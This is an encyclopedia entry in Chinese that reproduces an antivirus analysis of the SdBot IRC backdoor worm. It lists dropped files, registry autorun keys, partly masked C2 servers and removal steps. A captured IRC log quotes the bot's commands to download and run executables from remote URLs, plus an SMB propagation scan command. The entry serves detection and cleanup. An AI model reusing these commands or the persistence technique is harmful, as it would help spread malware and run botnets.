请输入您要查询的百科知识:

 

词条 Backdoor.Win32.SdBot.awm
释义

该病毒运行后,衍生病毒文件到系统程序目录下。添加注册表自动运行项与系统服务项以实现随机引导病毒体。创建大量线程用于扫描用户所在网络,若发现存在默认共享或弱口令则传播自身。此病毒为一个利用 Windows 平台下 IRC 协议的网络蠕虫,受感染用户可能会被操纵进行 Ddos 攻击、远程控制、发送垃圾邮件、创建本地 Tftp 、 FTP 等行为。

概述

病毒名称: Backdoor.Win32.SdBot.awm

中文名称: recsl机器人

病毒类型: 后门类

文件 MD5: 2001D19F828FCE890562DDDB05D68797

公开范围: 完全公开

危害等级: 5

文件长度: 加壳后 76,583 字节,脱壳后518,656 字节

感染系统: WinNT4以上系统

开发工具: Microsoft Visual C++ 6.0

加壳类型 : PECompact变形壳

命名对照: AVG[Trojan horse IRC/BackDoor.SdBot2.SEB]

F-Prot[W32/Backdoor.AFUX]

McAfee [W32/Sdbot.worm.gen.l]

行为分析

衍生

1 、衍生下列副本与文件:

%Temporary Internet Files%\\1.exe

%Temporary Internet Files%\\d.exe

%System32%\\1.exe

%System32%\\dl.exe

%System32%\\helpersysem.exe Trojan-Proxy.Win32.Slaper.e

%System32%\\mysvcc.exe Backdoor.Win32.SdBot.awm

%System32%\\sysem.exe Backdoor.Win32.IRCBot.aak

注册表

2 、新建注册表键值:

HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\sysms

Value: String: "C:\\WINDOWS\\System32\\1.exe"

HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\msvccc66

Value: String: "dl.exe"

HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\mysvcig38

Value: String: "mysvcc.exe"

HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\sysms

Value: String: "C:\\WINDOWS\\System32\\1.exe"

HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunServices\\

msvccc66 Value: String: "dl.exe"

HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunServices\\

mysvcig38 Value: String: "mysvcc.exe"

3 、修改注册表键值用以标记已感染:

HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Ole\\EnableDCOM

New: String: "N"

Old: String: "Y"

HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Lsa\\restrictanonymous

New: DWORD: 1 (0x1)

Old: DWORD: 0 (0)

HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\restrictanonymous

New: DWORD: 1 (0x1)

Old: DWORD: 0 (0)

连接

4 、连接的 IRC 服务器包括下列:

TCP->Server:66.1*9.*5.1*2:18080

TCP->Server:81.9*.1*8.2*4:16666

TCP->Server:209.1*0.*2.1*0:24104

5 、连接后的操作如下,包括从指定服务器下载并运行文件、对本地网络进行扫描文件共享目录等:

TCP->Server:66.1*9.*5.1*2:18080 :

NICK CHN|

USER fbwwty 0 0 :CHN|

:NEWSLbb 001 CHN| :MySQL CHN|!~fbwwty@222.1*1.7.2*3

:NEWSLbb 376 CHN| :

:CHN| MODE CHN| :+i

USERHOST CHN|

:NEWSLbb 302 CHN| :CHN|=+~fbwwty@222.1*1.7.2*3

MODE CHN|+x+i

JOIN ##sl,##sl2 he 爃 e

:CHN|!~fbwwty@222.171.7.213 JOIN :##sl

:NEWSLbb 332 CHN|##sl :. 燿 http://72.2*.1.2*0/d.exe dl.exe 1

:NEWSLbb 333 CHN|##sl 10:30 PM 1175724995

:NEWSLbb 366 CHN| ##sl :End of /NAMES list.

:CHN|!~fbwwty@2*2.1*1.7.213 JOIN :##sl2

:NEWSLbb 332 CHN| ##sl2 :. 燿 http://72.2*.4.1*6/1.exe 1.exe 1

:NEWSLbb 333 CHN|##sl2 10:30 PM 1175372145

:NEWSLbb 366 CHN| ##sl2 :End of /NAMES list.

PRIVMSG ##sl :[DOWNLOAD]: Downloading

URL: http://72.*0.1.2*0/d.exe to: dl.exe.

PRIVMSG ##sl2 :[DOWNLOAD]: Downloading

URL: http://72.20.4.126/1.exe to: 1.exe.

PRIVMSG ##sl :[DOWNLOAD]: Downloaded 62.0 KB to dl.exe @ 31.0 KB/sec.

PRIVMSG ##sl :[DOWNLOAD]: Opened: dl.exe.

PRIVMSG ##sl :[DOWNLOAD]: Opened: dl.exe.

PRIVMSG ##sl2 :[DOWNLOAD]: Downloaded 71.2 KB to 1.exe @ 7.1 KB/sec.

PRIVMSG ##sl2 :[DOWNLOAD]: Opened: 1.exe.

TCP->Server:81.9*.1*8.234:16666

NICK CHN|

USER tjyqnod 0 0 :CHN|

:MySQL 001 CHN| :MySQL CHN|!~tjyqnod@2*2.1*1.7.213

:MySQL 376 CHN| :

:CHN| MODE CHN| :+i

USERHOST CHN|

:MySQL 302 CHN| :CHN|=+~tjyqnod@2*2.1*1.7.213

MODE CHN| +x+i

JOIN ##last,##last2 fe 爁 e

:CHN|!~tjyqnod@2*2.1*1.7.213 JOIN :##last

:MySQL 332 CHN| ##last :.advscan asn1smb 50 5 0 -r

:MySQL 333 CHN| ##last 10:30 PM 1175586546

:MySQL 366 CHN| ##last :End of /NAMES list.

:CHN|!~tjyqnod@2*2.1*1.7.213 JOIN :##last2

:MySQL 366 CHN| ##last2 :End of /NAMES list.

PRIVMSG ##last :[SCAN]: Random Port Scan started on 10.0.x.x:445

with a delay of 5 seconds for 0 minutes using 50 threads.

注: % System% 是一个可变路径。病毒通过查询操作系统来决定当前 System 文件夹的位置。 Windows2000/NT 中默认的安装路径是 C:\\Winnt\\System32 , windows95/98/me 中默认的安装路径是 C:\\Windows\\System , windowsXP 中默认的安装路径是 C:\\Windows\\System32 。

--------------------------------------------------------------------------------

清除方案

1 、 使用安天木马防线可彻底清除此病毒 ( 推荐 )

2 、 手工清除请按照行为分析删除对应文件,恢复相关系统设置。

(1) 使用安天木马防线结束病毒进程:

1.exe

dl.exe

mysvcc.exe

(2) 病毒添加的注册表项:

HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\

CurrentVersion\\Run\\sysms

Value: String: "C:\\WINDOWS\\System32\\1.exe"

HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\

CurrentVersion\\Run\\msvccc66

Value: String: "dl.exe"

HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\

CurrentVersion\\Run\\mysvcig38

Value: String: "mysvcc.exe"

HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\

CurrentVersion\\Run\\sysms

Value: String: C:\\WINDOWS\\System32\\1.exe"

HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\

CurrentVersion\\RunServices\\msvccc66

Value: String: "dl.exe"

HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\

CurrentVersion\\RunServices\\mysvcig38

Value: String: "mysvcc.exe"

(3) 恢复注册表下列键值为旧值:

HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Ole\\EnableDCOM

New: String: "N"

Old: String: "Y"

HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Lsa\\

restrictanonymous

New: DWORD: 1 (0x1)

Old: DWORD: 0 (0)

HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\

restrictanonymous

New: DWORD: 1 (0x1)

Old: DWORD: 0 (0)

(4) 删除病毒释放文件:

%Temporary Internet Files%\\1.exe

%Temporary Internet Files%\\d.exe

%System32%\\1.exe

%System32%\\dl.exe

%System32%\\helpersysem.exe

%System32%\\mysvcc.exe

%System32%\\sysem.exe

随便看

 

百科全书收录4421916条中文百科知识,基本涵盖了大多数领域的百科知识,是一部内容开放、自由的电子版百科全书。

 

Copyright © 2004-2023 Cnenc.net All Rights Reserved
更新时间:2024/12/24 1:41:52